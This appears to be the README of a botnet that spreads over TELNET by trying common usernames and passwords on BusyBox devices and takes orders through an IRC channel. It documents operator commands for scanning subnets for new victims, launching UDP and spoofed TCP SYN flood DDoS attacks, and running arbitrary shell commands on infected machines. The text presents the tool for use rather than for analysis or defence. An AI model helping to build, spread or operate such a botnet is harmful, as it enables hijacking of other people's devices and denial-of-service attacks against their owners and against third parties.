A simple botnet that propagates via TELNET, controlled via IRC server, can execute shell commands and launch DDoS attacks
This botnet targets TELNET services with common usernames and passwords and is capable of launch DDoS attacks. It handle shell commands too, returning the result via IRC channel.
This botnet is tested only in telnet service implemented by BusyBox linux. There is no guarantee of success in other implementations.
Two types of DDoS is possible UDP flood and TCP SYN flood.
Possible commands that the botmaster can use in IRC channel
@help : prints help screen directly to the IRC channel
@scan <ip> : make a scanning of the network passed, the scan only test the fourth octet, e.g @scan 172.17.0.0 will scan from 172.17.0.1 to 172.17.0.254. If is ommited or set to 0, then the bot IP itself is assumed. Let blank can be useful in compromised networks where bot is sit in
@attack udp <target ip> <number of packets> <source port | 0> <destination port | 0> <rate | 0> <spoof | nospoof> <spoofed ip | 0> :
launches DDoS attack of type UDP flood. is the ip of the victim. if
@attack tcp <target ip> <number of packets> <source port | 0> <destination port | 0> same as UDP attack, but source IP is spoofed and random at every packet, same as port, if ports are setted to zero they are randomized at every packet. TCP SYN flood implies spoofed source IP.
@kill destroy bot process
!<shell command> : to execute shell commands just put a ! infront